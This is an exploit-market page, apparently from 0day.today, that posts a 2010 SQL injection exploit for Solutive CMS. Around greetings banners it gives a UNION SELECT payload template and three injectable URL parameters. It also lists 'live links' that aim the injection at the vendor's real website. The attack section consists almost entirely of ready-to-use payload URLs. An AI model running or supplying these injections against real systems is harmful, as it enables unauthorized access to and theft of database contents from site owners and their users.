[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Solutive CMS SQL Injection Vulnerability

Author
Th3 RDX
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-11608
Category
web applications
Date add
04-04-2010
Platform
php
========================================
Solutive CMS SQL Injection Vulnerability
========================================

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Gr33tz to ### www.Teamicw.in | www.IndiShell.in | www.AndhraHackers.com ###
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
             L0v3 T0 : "R00T", "R45c4l" & "Agent: 1c3c0ld"
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 
##############################################################################
%//
 
----- [ Founder ] -----
 
    Th3 RDX
 
----- [ E - mail ] -----
 
 th3rdx@gmail.com
 
 
                                                        %\\
##############################################################################
 
##############################################################################
%//
 
----- [Title] -----
 
Solutive CMS SQL Injection Vulnerability
 
----- [ Vendor ] -----
 
http://www.solutive.net/
 
                                                        %\\
##############################################################################
 
##############################################################################
%//
 
----- [ Exploit (s) ] -----
 
Put [CODE] = SQL Injection Code
 
{e.g = product_detail.php?id=7+and+1=0+ Union Select  1 ,2,
UNHEX(HEX([visible]))
,4,5,6 (tables & column) }
 
[SQLi] http://server/cms/product_detail.php?id=7[CODE]
 
[SQLi] http://server/cms/news_content.php?id=9[CODE]
 
[SQLi] http://server/cms/products_by_cat.php?Cat_id=1[CODE]
 
 
                                                        %\\
##############################################################################
 
##############################################################################
%//
 
              >>>>>> TESTED ON <<<<<<
 
----- [ Live Link (s) ] -----
 
[Link] http://solutive.net/cms01/product_detail.php?id=7[CODE]
 
[Link] http://solutive.net/cms01/news_content.php?id=9[CODE]
 
[Link] http://solutive.net/cms01/products_by_cat.php?Cat_id=1[CODE]
 
                                                        %\\
##############################################################################
 
 
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  Thanks To All: www.Exploit-db.com | wwww.inj3ct0r.com | www.hack0wn.com
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Bug discovered : 04 April 2010
 
finish(0);
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=



#  0day.today [2024-11-14]  #